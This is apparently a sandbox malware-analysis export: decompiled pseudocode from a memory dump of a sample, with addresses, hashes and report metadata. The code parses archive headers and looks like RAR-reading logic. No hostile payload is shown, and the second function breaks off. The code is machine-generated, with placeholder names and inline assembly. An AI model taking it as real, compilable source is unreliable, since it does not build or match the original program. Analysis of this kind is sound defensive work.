                				signed int _t319;
                				signed int _t328;
                				signed int _t329;
                				signed int _t331;
                				signed int _t335;
                				signed int _t350;
                				signed char _t352;
                				unsigned int _t363;
                				intOrPtr _t370;
                				void* _t373;
                				intOrPtr _t374;
                				void* _t381;
                				signed int _t383;
                				void* _t384;
                				signed int _t395;
                				intOrPtr* _t399;
                				signed int _t414;
                				signed int _t423;
                				char _t432;
                				signed int _t433;
                				signed int _t438;
                				signed int _t442;
                				intOrPtr _t450;
                				unsigned int _t456;
                				unsigned int _t459;
                				signed int _t463;
                				signed int _t471;
                				signed int _t480;
                				signed int _t485;
                				signed int _t500;
                				signed int _t502;
                				signed char _t503;
                				signed int _t504;
                				unsigned int _t505;
                				intOrPtr _t514;
                				void* _t515;
                				void* _t522;
                				signed int _t525;
                				void* _t526;
                				signed int _t536;
                				void* _t542;
                				void* _t544;
                				intOrPtr _t547;
                				void* _t548;
                				void* _t550;
                				void* _t551;
                				intOrPtr _t561;
                
                				_t551 = _t550 - 0x68;
                				E003EEB78(0x4026be, _t548);
                				E003EEC50(0x2068);
                				_t399 = __ecx;
                				E003DCB83(_t548 + 0x30, __ecx);
                				 *(_t548 + 0x64) = 0;
                				 *((intOrPtr*)(_t548 - 4)) = 0;
                				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
                					L18:
                					 *((char*)(_t548 + 0x6a)) = 0;
                					L19:
                					_push(7);
                					_t237 = E003DCD8A();
                					__eflags = _t237 - 7;
                					if(_t237 >= 7) {
                						 *(_t399 + 0x220c) = 0;
                						 *(_t399 + 0x21fc) = E003DCBFB(_t548 + 0x30);
                						_t536 = E003DCD66(_t548 + 0x30, 4);
                						_t240 = E003DCCFB();
                						__eflags = _t240 | _t500;
                						if((_t240 | _t500) == 0) {
                							L88:
                							E003D20D7(_t399);
                							L89:
                							E003D15FB(_t548 + 0x30);
                							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
                							return  *(_t548 + 0x64);
                						}
                						__eflags = _t536;
                						if(_t536 == 0) {
                							goto L88;
                						}
                						_t46 = _t536 + 4; // 0x4
                						_t47 = _t536 - 3; // -3
                						_t514 = _t46 + _t240;
                						_t414 = _t47 + _t240;
                						__eflags = _t414;
                						if(_t414 < 0) {
                							goto L88;
                						}
                						__eflags = _t514 - 7;
                						if(_t514 < 7) {
                							goto L88;
                						}
                						_push(_t414);
                						E003DCD8A();
                						__eflags =  *(_t548 + 0x48) - _t514;
                						if( *(_t548 + 0x48) < _t514) {
                							goto L20;
                						}
                						_t246 = E003DCCDB(_t548 + 0x30);
                						 *(_t399 + 0x2200) = E003DCCFB();
                						_t248 = E003DCCFB();
                						 *(_t399 + 0x2204) = _t248;
                						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
                						_t515 = _t399 + 0x21fc;
                						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
                						__eflags =  *_t515 - _t246;
                						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
                						_t60 = _t548 + 0x6b;
                						 *_t60 =  *_t515 != _t246;
                						__eflags =  *_t60;
                						if( *_t60 == 0) {
                							L29:
                							_t252 = 0;
                							__eflags =  *(_t399 + 0x2204) & 0x00000001;
                							 *(_t548 + 0x58) = 0;
                							 *(_t548 + 0x54) = 0;
                							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
                								L33:
                								__eflags =  *(_t399 + 0x2204) & 0x00000002;
                								_t539 = _t252;
                								 *(_t548 + 0x60) = _t252;
                								 *(_t548 + 0x5c) = _t252;
                								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
                									_t363 = E003DCCFB();
                									_t539 = _t363;
                									 *(_t548 + 0x60) = _t363;
                									 *(_t548 + 0x5c) = _t500;
                								}
                								_t253 = E003D1983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
                								asm("adc ecx, edx");
                								 *((intOrPtr*)(_t399 + 0x6cc0)) = E003D3EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
                								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
                								_t502 =  *(_t399 + 0x2200);
                								_t257 = _t502 - 1;
                								__eflags = _t257;
                								if(_t257 == 0) {
                									E003DAD5E(_t399 + 0x2220);
                									_t423 = 5;
                									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
                									_t503 = E003DCCFB();
                									 *(_t399 + 0x6ccd) = _t503 & 1;
                									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
                									_t432 = 1;
                									 *((char*)(_t399 + 0x6cd2)) = 1;
                									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
                									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
                									_t269 = 0;
                									 *((char*)(_t399 + 0x6cd0)) = 0;
                									__eflags = _t503 & 0x00000002;
                									if((_t503 & 0x00000002) == 0) {
                										_t504 = 0;
                									} else {
                										_t504 = E003DCCFB();
                										_t269 = 0;
                										_t432 = 1;
                									}
                									 *(_t399 + 0x6cf0) = _t504;
                									__eflags =  *(_t399 + 0x6ccd);
                									if( *(_t399 + 0x6ccd) == 0) {
                										L84:
                										_t432 = _t269;
                										goto L85;
                									} else {
                										__eflags = _t504;
                										if(_t504 == 0) {
                											L85:
                											 *((char*)(_t399 + 0x6cd1)) = _t432;
                											_t433 =  *(_t548 + 0x58);
                											__eflags = _t433 |  *(_t548 + 0x54);
                											if((_t433 |  *(_t548 + 0x54)) != 0) {
                												E003D2210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
                											}
                											goto L87;
                										}
                										goto L84;
                									}
                								} else {
                									_t277 = _t257 - 1;
                									__eflags = _t277;
                									if(_t277 == 0) {
                										L49:
                										__eflags = _t502 - 2;
                										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
                										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
                										 *(_t548 + 0x2c) = _t522;
                										E003DACC4(_t522, 0);
                										_t438 = 5;
                										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
                										_t542 =  *(_t548 + 0x2c);
                										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
                										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
                										 *((char*)(_t542 + 0x10f9)) = 1;
                										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
                										 *(_t542 + 0x1094) = E003DCCFB();
                										 *(_t542 + 0x1060) = E003DCCFB();
                										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
                										__eflags = _t289;
                										 *(_t542 + 0x1064) = _t502;
                										 *(_t542 + 0x109a) = _t289;
                										if(_t289 != 0) {
                											 *(_t542 + 0x1060) = 0x7fffffff;
                											 *(_t542 + 0x1064) = 0x7fffffff;
                										}
                										_t442 =  *(_t542 + 0x105c);
                										_t525 =  *(_t542 + 0x1064);
                										_t290 =  *(_t542 + 0x1058);
                										_t505 =  *(_t542 + 0x1060);
                										__eflags = _t442 - _t525;
                										if(__eflags < 0) {
                											L54:
                											_t290 = _t505;
                											_t442 = _t525;
                											goto L55;
                										} else {
                											if(__eflags > 0) {
                												L55:
                												 *(_t542 + 0x106c) = _t442;
                												 *(_t542 + 0x1068) = _t290;
                												_t291 = E003DCCFB();
                												__eflags =  *(_t542 + 0x1094) & 0x00000002;
                												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
                												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
                													E003E158F(_t542 + 0x1040, E003DCBFB(_t548 + 0x30), 0);
                												}
                												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
                												__eflags =  *(_t542 + 0x1094) & 0x00000004;
                												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
                													 *(_t542 + 0x1070) = 2;
                													 *((intOrPtr*)(_t542 + 0x1074)) = E003DCBFB(_t548 + 0x30);
                												}
                												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
                												_t292 = E003DCCFB();
                												 *(_t548 + 0x60) = _t292;
                												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
                												_t450 = (_t292 & 0x0000003f) + 0x32;
                												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
                												__eflags = _t450 - 0x32;
                												if(_t450 != 0x32) {
                													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
                												}
                												 *((char*)(_t542 + 0x18)) = E003DCCFB();
                												_t526 = E003DCCFB();
                												 *(_t542 + 0x10fc) = 2;
                												_t295 =  *((intOrPtr*)(_t542 + 0x18));
                												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
                												__eflags = _t295 - 1;
                												if(_t295 != 1) {
                													__eflags = _t295;
                													if(_t295 == 0) {
                														_t178 = _t542 + 0x10fc;
                														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
                														__eflags =  *_t178;
                													}
                												} else {
                													 *(_t542 + 0x10fc) = 1;
                												}
                												_t456 =  *(_t542 + 8);
                												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
                												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
                												__eflags =  *(_t548 + 0x64) - 2;
                												_t459 =  *(_t548 + 0x60);
                												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
                												if( *(_t548 + 0x64) != 2) {
                													L68:
                													_t302 = 0;
                													__eflags = 0;
                													goto L69;
                												} else {
                													__eflags = _t459 & 0x00000040;
                													if((_t459 & 0x00000040) == 0) {
                														goto L68;
                													}
                													_t302 = 1;
                													L69:
                													 *((char*)(_t542 + 0x10f0)) = _t302;
                													_t304 =  *(_t542 + 0x1094) & 1;
                													 *(_t542 + 0x10f1) = _t304;
                													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
                													asm("sbb eax, eax");
                													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
                													asm("sbb eax, eax");
                													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
                													__eflags = _t526 - 0x1fff;
                													if(_t526 >= 0x1fff) {
                														_t526 = 0x1fff;
                													}
                													E003DCC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
                													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
                													_push(0x800);
                													_t527 = _t542 + 0x28;
                													_push(_t542 + 0x28);
                													_push(_t548 - 0x2074);
                													E003E1C3B();
                													_t463 =  *(_t548 + 0x58);
                													_t318 = _t463 |  *(_t548 + 0x54);
                													__eflags = _t463 |  *(_t548 + 0x54);
                													if((_t463 |  *(_t548 + 0x54)) != 0) {
                														_t318 = E003D2210(_t399, _t509, _t548 + 0x30, _t463, _t542);
                													}
                													__eflags =  *(_t548 + 0x64) - 2;
                													if( *(_t548 + 0x64) != 2) {
                														_t319 = E003F3E49(_t318, _t527, L"CMT");
                														__eflags = _t319;
                														if(_t319 == 0) {
                															 *((char*)(_t399 + 0x6cce)) = 1;
                														}
                													} else {
                														E003D2134(_t399, _t542);
                													}
                													__eflags =  *(_t548 + 0x6b);
                													if(__eflags != 0) {
                														E003D2021(__eflags, 0x1c, _t399 + 0x32, _t527);
                													}
                													L87:
                													 *(_t548 + 0x64) =  *(_t548 + 0x48);
                													goto L89;
                												}
                											}
                											__eflags = _t290 - _t505;
                											if(_t290 > _t505) {
                												goto L55;
                											}
                											goto L54;
                										}
                									}
                									_t328 = _t277 - 1;
                									__eflags = _t328;
                									if(_t328 == 0) {
                										goto L49;
                									}
                									_t329 = _t328 - 1;
                									__eflags = _t329;
                									if(_t329 == 0) {
                										_t471 = 5;
                										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
                										_t331 = E003DCCFB();
                										__eflags = _t331;
                										if(_t331 == 0) {
                											 *(_t399 + 0x2274) = E003DCCFB() & 0x00000001;
                											_t335 = E003DCBAF(_t548 + 0x30) & 0x000000ff;
                											 *(_t399 + 0x2278) = _t335;
                											__eflags = _t335 - 0x18;
                											if(_t335 <= 0x18) {
                												E003DCC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
                												__eflags =  *(_t399 + 0x2274);
                												if( *(_t399 + 0x2274) != 0) {
                													_t544 = _t399 + 0x228c;
                													E003DCC5D(_t548 + 0x30, _t544, 8);
                													E003DCC5D(_t548 + 0x30, _t548 + 0x64, 4);
                													E003E0016(_t548 - 0x74);
                													_push(8);
                													_push(_t544);
                													_push(_t548 - 0x74);
                													E003E005C();
                													_push(_t548 + 8);
                													E003DFF33(_t548 - 0x74);
                													_t350 = E003F0C4A(_t548 + 0x64, _t548 + 8, 4);
                													asm("sbb al, al");
                													_t352 =  ~_t350 + 1;
                													__eflags = _t352;
                													 *(_t399 + 0x2274) = _t352;
                												}
                												 *((char*)(_t399 + 0x6cd4)) = 1;
                												goto L87;
                											}
                											_push(_t335);
                											_push(L"hc%u");
                											L43:
                											_push(0x14);
                											_push(_t548);
                											E003D4092();
                											E003D403D(_t399, _t399 + 0x32, _t548);
                											goto L89;
                										}
                										_push(_t331);
                										_push(L"h%u");
                										goto L43;
                									}
                									__eflags = _t329 == 1;
                									if(_t329 == 1) {
                										_t480 = 5;
                										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
                										 *(_t399 + 0x45c4) = E003DCCFB() & 0x00000001;
                										 *((short*)(_t399 + 0x45c6)) = 0;
                										 *((char*)(_t399 + 0x45c5)) = 0;
                									}
                									goto L87;
                								}
                							}
                							_t485 = E003DCCFB();
                							 *(_t548 + 0x54) = _t500;
                							_t252 = 0;
                							 *(_t548 + 0x58) = _t485;
                							__eflags = _t500;
                							if(__eflags < 0) {
                								goto L33;
                							}
                							if(__eflags > 0) {
                								goto L88;
                							}
                							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
                							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
                								goto L88;
                							}
                							goto L33;
                						}
                						E003D20D7(_t399);
                						 *((char*)(_t399 + 0x6cdc)) = 1;
                						E003D6D83(0x411098, 3);
                						__eflags =  *((char*)(_t548 + 0x6a));
                						if(__eflags == 0) {
                							goto L29;
                						} else {
                							E003D2021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
                							L6:
                							 *((char*)(_t399 + 0x6cdd)) = 1;
                							goto L89;
                						}
                					}
                					L20:
                					E003D3FFC(_t399, _t500);
                					goto L89;
                				}
                				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
                				asm("adc eax, ecx");
                				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
                				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
                					goto L18;
                				} else {
                					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
                					 *((char*)(_t548 + 0x6a)) = 1;
                					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
                					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
                						 *0x403278(_t548 + 0x18, 0x10);
                						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
                						__eflags = _t373 - 0x10;
                						if(_t373 != 0x10) {
                							goto L20;
                						}
                						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
                						__eflags =  *((char*)(_t374 + 0x6124));
                						if( *((char*)(_t374 + 0x6124)) != 0) {
                							L10:
                							 *(_t548 + 0x6b) = 1;
                							L11:
                							E003D3E6D(_t399);
                							_t534 = _t399 + 0x227c;
                							_t547 = _t399 + 0x1038;
                							E003D603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
                							__eflags =  *(_t399 + 0x2274);
                							if( *(_t399 + 0x2274) == 0) {
                								L16:
                								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
                								goto L19;
                							} else {
                								_t381 = _t399 + 0x228c;
                								while(1) {
                									_t383 = E003F0C4A(_t548 + 0x28, _t381, 8);
                									_t551 = _t551 + 0xc;
                									__eflags = _t383;
                									if(_t383 == 0) {
                										goto L16;
                									}
                									__eflags =  *(_t548 + 0x6b);
                									_t384 = _t399 + 0x32;
                									_push(_t384);
                									_push(_t384);
                									if(__eflags != 0) {
                										_push(6);
                										E003D2021(__eflags);
                										 *((char*)(_t399 + 0x6cdd)) = 1;
                										E003D6D83(0x411098, 0xb);
                										goto L89;
                									}
                									_push(0x83);
                									E003D2021(__eflags);
                									E003DF279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
                									E003D3E6D(_t399);
                									E003D603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
                									__eflags =  *(_t399 + 0x2274);
                									_t381 = _t399 + 0x228c;
                									if( *(_t399 + 0x2274) != 0) {
                										continue;
                									}
                									goto L16;
                								}
                								goto L16;
                							}
                						}
                						_t395 = E003E1B63();
                						 *(_t548 + 0x6b) = 0;
                						__eflags = _t395;
                						if(_t395 == 0) {
                							goto L11;
                						}
                						goto L10;
                					} else {
                						E003D138B(_t563, 0x7f, _t399 + 0x32);
                						goto L6;
                					}
                				}
                			}

                0x003d38bf
                0x003d38c6
                0x003d38cf
                0x003d38d7
                0x003d38da
                0x003d38dd
                0x003d38e0
                0x003d38e2
                0x003d38e2
                0x003d38f4
                0x003d3908
                0x003d390a
                0x003d3914
                0x003d3919
                0x003d391f
                0x003d3921
                0x003d392b
                0x003d392d
                0x003d392f
                0x003d392f
                0x003d392f
                0x003d392f
                0x003d3923
                0x003d3923
                0x003d3923
                0x003d3936
                0x003d3940
                0x003d3952
                0x003d3958
                0x003d395c
                0x003d395f
                0x003d3965
                0x003d3970
                0x003d3970
                0x003d3970
                0x00000000
                0x003d3967
                0x003d3967
                0x003d396a
                0x00000000
                0x00000000
                0x003d396c
                0x003d3972
                0x003d3972
                0x003d397e
                0x003d3983
                0x003d3994
                0x003d3998
                0x003d399e
                0x003d39ad
                0x003d39b2
                0x003d39bd
                0x003d39bf
                0x003d39c1
                0x003d39c1
                0x003d39ce
                0x003d39d3
                0x003d39e1
                0x003d39e6
                0x003d39e9
                0x003d39ea
                0x003d39eb
                0x003d39f0
                0x003d39f5
                0x003d39f5
                0x003d39f8
                0x003d3a02
                0x003d3a02
                0x003d3a07
                0x003d3a0b
                0x003d3a1d
                0x003d3a24
                0x003d3a26
                0x003d3a28
                0x003d3a28
                0x003d3a0d
                0x003d3a10
                0x003d3a10
                0x003d3a2f
                0x003d3a33
                0x003d3a40
                0x003d3a40
                0x003d3b01
                0x003d3b04
                0x00000000
                0x003d3b04
                0x003d3965
                0x003d384f
                0x003d3851
                0x00000000
                0x00000000
                0x00000000
                0x003d3851
                0x003d384b
                0x003d3652
                0x003d3652
                0x003d3655
                0x00000000
                0x00000000
                0x003d365b
                0x003d365b
                0x003d365e
                0x003d36a0
                0x003d36ad
                0x003d36b2
                0x003d36b7
                0x003d36b9
                0x003d36f0
                0x003d36fb
                0x003d36fe
                0x003d3704
                0x003d3707
                0x003d371d
                0x003d3722
                0x003d3729
                0x003d372d
                0x003d3737
                0x003d3745
                0x003d374e
                0x003d3753
                0x003d3755
                0x003d3759
                0x003d375a
                0x003d3762
                0x003d3767
                0x003d3776
                0x003d3780
                0x003d3782
                0x003d3782
                0x003d3784
                0x003d3784
                0x003d378a
                0x00000000
                0x003d378a
                0x003d3709
                0x003d370a
                0x003d36c1
                0x003d36c4
                0x003d36c6
                0x003d36c7
                0x003d36d9
                0x00000000
                0x003d36d9
                0x003d36bb
                0x003d36bc
                0x00000000
                0x003d36bc
                0x003d3660
                0x003d3663
                0x003d366b
                0x003d3678
                0x003d3684
                0x003d368c
                0x003d3693
                0x003d3693
                0x00000000
                0x003d3663
                0x003d3643
                0x003d35c1
                0x003d35c3
                0x003d35c6
                0x003d35c8
                0x003d35cb
                0x003d35cd
                0x00000000
                0x00000000
                0x003d35cf
                0x00000000
                0x00000000
                0x003d35d5
                0x003d35db
                0x00000000
                0x00000000
                0x00000000
                0x003d35db
                0x003d3579
                0x003d3585
                0x003d358c
                0x003d3591
                0x003d3595
                0x00000000
                0x003d3597
                0x003d359e
                0x003d3375
                0x003d3375
                0x00000000
                0x003d3375
                0x003d3595
                0x003d34b8
                0x003d34ba
                0x00000000
                0x003d34ba
                0x003d3339
                0x003d333c
                0x003d333e
                0x003d3344
                0x00000000
                0x003d3358
                0x003d3358
                0x003d335e
                0x003d3362
                0x003d3368
                0x003d338e
                0x003d3396
                0x003d3398
                0x003d339b
                0x00000000
                0x00000000
                0x003d33a1
                0x003d33a7
                0x003d33ae
                0x003d33bd
                0x003d33bd
                0x003d33c1
                0x003d33c3
                0x003d33df
                0x003d33eb
                0x003d33f7
                0x003d33fc
                0x003d3403
                0x003d3482
                0x003d3482
                0x00000000
                0x003d3405
                0x003d3405
                0x003d340b
                0x003d3412
                0x003d3417
                0x003d341a
                0x003d341c
                0x00000000
                0x00000000
                0x003d341e
                0x003d3422
                0x003d3425
                0x003d3426
                0x003d3427
                0x003d3487
                0x003d3489
                0x003d3495
                0x003d349c
                0x00000000
                0x003d349c
                0x003d3429
                0x003d342e
                0x003d343f
                0x003d3446
                0x003d346e
                0x003d3473
                0x003d347a
                0x003d3480
                0x00000000
                0x00000000
                0x00000000
                0x003d3480
                0x00000000
                0x003d340b
                0x003d3403
                0x003d33b0
                0x003d33b5
                0x003d33b9
                0x003d33bb
                0x00000000
                0x00000000
                0x00000000
                0x003d336a
                0x003d3370
                0x00000000
                0x003d3370
                0x003d3368

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog_swprintf
                • String ID: CMT$h%u$hc%u
                • API String ID: 146138363-3282847064
                • Opcode ID: 418d16340742ffb935fa1c737f8cca53321859d20eb34bab671ebf42ad4ac0af
                • Instruction ID: ba62e10e84d859aaf525dfafba93a9beb1f1f36f05a8edbb9fc11569a57c9f9e
                • Opcode Fuzzy Hash: 418d16340742ffb935fa1c737f8cca53321859d20eb34bab671ebf42ad4ac0af
                • Instruction Fuzzy Hash: 273203725242859FDB16DF74D895AEA3BA5AF15300F04047FFD8A8F382DB709A49CB21
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E003D286B(intOrPtr* __ecx, void* __eflags) {
                				void* __ebp;
                				unsigned int _t329;
                				signed int _t334;
                				void* _t335;
                				void* _t337;
                				signed int _t340;
                				char _t354;
                				signed short _t361;
                				signed int _t364;
                				signed int _t371;
                				signed char _t374;
                				signed char _t377;
                				signed int _t378;
                				signed int _t395;
                				signed int _t396;
                				signed int _t400;
                				signed char _t413;
                				intOrPtr _t414;
                				char _t415;
                				signed int _t418;
                				signed int _t419;
                				signed int _t424;
                				signed int _t427;
                				signed int _t432;
                				signed short _t437;
                				signed short _t442;
                				unsigned int _t447;
                				signed int _t450;
                				signed int _t455;
                				signed int _t469;
                				void* _t470;
                				void* _t478;
                				signed char _t484;
                				signed int _t488;
                				signed int _t498;
                				signed int _t501;
                				signed int _t502;
                				signed int _t503;
                				intOrPtr* _t516;
                				signed int _t520;
                				signed int _t521;
                				signed int _t533;
                				signed int _t537;
                				signed int _t539;
                				unsigned int _t548;
                				signed int _t550;
                				signed int _t560;
                				signed int _t562;
                				signed int _t563;
                				intOrPtr* _t585;
                				void* _t593;
                				signed int _t597;
                				intOrPtr _t609;
                				signed int _t612;
                				signed int _t624;
                				signed char _t628;
                				void* _t639;
                				signed char _t640;
                				signed int _t643;
                				unsigned int _t644;
                				signed int _t647;
                				signed int _t648;
                				signed int _t650;
                				signed int _t651;
                				unsigned int _t653;
                				signed int _t657;
                				void* _t659;
                				void* _t665;
                				signed int _t668;
                				signed int _t669;
                				signed int _t670;
                				signed int _t671;
                				signed int _t672;
                				void* _t673;
                				signed int _t675;
                				intOrPtr* _t676;
                				signed int _t688;
                				void* _t694;
                				signed int _t695;
                				signed int _t697;
                				signed int _t699;
                				signed int _t701;
                				intOrPtr _t707;
                				intOrPtr* _t708;
                				intOrPtr _t718;
                
                				E003EEB78(0x4026a5, _t708);
                				E003EEC50(0x2024);
                				_t516 = __ecx;
                				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
                				E003DCB83(_t708 + 0x1c, __ecx);
                				 *(_t708 + 0x10) = 0;
                				 *((intOrPtr*)(_t708 - 4)) = 0;
                				_t657 = 7;
                				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
                					L7:
                					 *((char*)(_t708 + 0x5a)) = 0;
                					L8:
                					_push(_t657);
                					E003DCD8A();
                					__eflags =  *(_t708 + 0x34);
                					if( *(_t708 + 0x34) == 0) {
                						L5:
                						E003D3FFC(_t516, _t639);
                						L131:
                						E003D15FB(_t708 + 0x1c);
                						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
                						return  *(_t708 + 0x10);
                					}
                					 *(_t516 + 0x21fc) = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
                					 *(_t516 + 0x220c) = 0;
                					_t688 = E003DCBAF(_t708 + 0x1c) & 0x000000ff;
                					_t329 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
                					 *(_t516 + 0x2204) = _t329;
                					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
                					_t533 = E003DCBC6(_t708 + 0x1c) & 0x0000ffff;
                					 *(_t516 + 0x2208) = _t533;
                					 *(_t516 + 0x2200) = _t688;
                					__eflags = _t533 - _t657;
                					if(_t533 >= _t657) {
                						_t640 = 2;
                						_t334 = _t688 - 0x73;
                						__eflags = _t334;
                						if(_t334 == 0) {
                							 *(_t516 + 0x2200) = 1;
                							_t688 = 1;
                							__eflags = 1;
                							L20:
                							 *(_t516 + 0x21f4) = _t688;
                							__eflags = _t688 - 0x75;
                							if(_t688 == 0x75) {
                								L23:
                								_t335 = 6;
                								L25:
                								_push(_t335);
                								E003DCD8A();
                								_t337 = E003D1983(_t516,  *(_t516 + 0x2208));
                								asm("adc ecx, 0x0");
                								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
                								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
                								_t537 =  *(_t516 + 0x2200);
                								 *(_t708 + 0x18) = _t537;
                								_t340 = _t537 - 1;
                								__eflags = _t340;
                								if(_t340 == 0) {
                									_t659 = _t516 + 0x2220;
                									E003DAD5E(_t659);
                									_t539 = 5;
                									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
                									 *(_t516 + 0x2234) = E003DCBC6(_t708 + 0x1c);
                									_t640 = E003DCBFB(_t708 + 0x1c);
                									 *(_t516 + 0x2238) = _t640;
                									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
                									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
                									_t548 =  *(_t516 + 0x2228);
                									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
                									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
                									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
                									__eflags = _t640;
                									if(_t640 != 0) {
                										L117:
                										_t354 = 1;
                										L118:
                										 *((char*)(_t516 + 0x6cd0)) = _t354;
                										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
                										_t550 = _t548 >> 0x00000004 & 0x00000001;
                										__eflags = _t550;
                										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
                										 *(_t516 + 0x6cd2) = _t550;
                										L119:
                										_t657 = 7;
                										L120:
                										_t361 = E003DCCAC(_t708 + 0x1c, 0);
                										__eflags =  *(_t516 + 0x21fc) - (_t361 & 0x0000ffff);
                										if( *(_t516 + 0x21fc) == (_t361 & 0x0000ffff)) {
                											L130:
                											 *(_t708 + 0x10) =  *(_t708 + 0x34);
                											goto L131;
                										}
                										_t364 =  *(_t516 + 0x2200);
                										__eflags = _t364 - 0x79;
                										if(_t364 == 0x79) {
                											goto L130;
                										}
                										__eflags = _t364 - 0x76;
                										if(_t364 == 0x76) {
                											goto L130;
                										}
                										__eflags = _t364 - 5;
                										if(_t364 != 5) {
                											L128:
                											 *((char*)(_t516 + 0x6cdc)) = 1;
                											E003D6D83(0x411098, 3);
                											__eflags =  *((char*)(_t708 + 0x5a));
                											if(__eflags == 0) {
                												goto L130;
                											}
                											E003D2021(__eflags, 4, _t516 + 0x32, _t516 + 0x32);
                											 *((char*)(_t516 + 0x6cdd)) = 1;
                											goto L131;
                										}
                										__eflags =  *(_t516 + 0x45c6);
                										if( *(_t516 + 0x45c6) == 0) {
                											goto L128;
                										}
                										 *0x403278();
